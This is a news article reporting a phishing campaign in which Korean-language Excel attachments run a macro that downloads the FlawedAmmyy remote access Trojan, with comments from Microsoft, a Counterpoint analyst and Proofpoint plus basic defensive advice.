Office applications have always been the target for cybercriminals to attack Windows PCs and they are doing it yet again. New reports suggest about this new spread of malware via excel attachment in emails in macro. A macro is an action or a set of actions that you may run as many times as you want. It can be found under the 'developer' tab on an excel. Surprisingly, even if your Windows PC is fully patched, you might still be at risk.
The attack starts with an email and .xls attachment with content in the Korean language. As soon as a user opens the file, the .xls file automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive. "The MSI archive contains a digitally signed executable that is extracted and run, and that decrypts and runs another executable in memory. This executable then downloads and decrypts another file, wsus.exe, which was also digitally signed on June 19. wsus.exe decrypts and runs the final payload directly in memory. The final payload is the remote access Trojan FlawedAmmyy," explains Microsoft Security Intelligence. The company is already fighting this Windows malware and is suggesting users not to enable macro.
Anomaly detection helped Microsoft uncover a new campaign that employs a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory. As the attack starts with an email and .xls attachment with content in the Korean language, it might be assumed that it was primarily targetted at Korean users.
Explaining about this new malware attack, Satyajit Sinha, Research Analyst with Counterpoint Research, dedicated to IoT, Mobility, Cyber-Security and Smart Device Ecosystem says, "This malware is known as Macro Malware, and it's not new. First discovered in July 1995, it is making its comeback through phishing emails. It is spreading through an e-mail requesting users to open the attachment. However, this time, the malware doesn't require the user to enable macro. It runs a macro automatically when a user opens the attached Excel/Word file. As this malware is not targeting any specific exploits in the system, even fully patched PC /devices can be its target."
Sinha suggests consumers stay safe by applying spam and junk filters and not opening any attachment without confirmation of who the sender is.
On the other hand, Microsoft says that its Threat Protection defends customers from this attack. "Cloud-based machine learning protections in Microsoft Defender ATP blocked all of the components of this attack at first sight, including the FlawedAmmyy RAT payload. Office 365 ATP detects the email campaign."
Security firm Proofpoint says that the malicious campaign has been started by a group called TA505, which has been responsible for similar attacks in the past.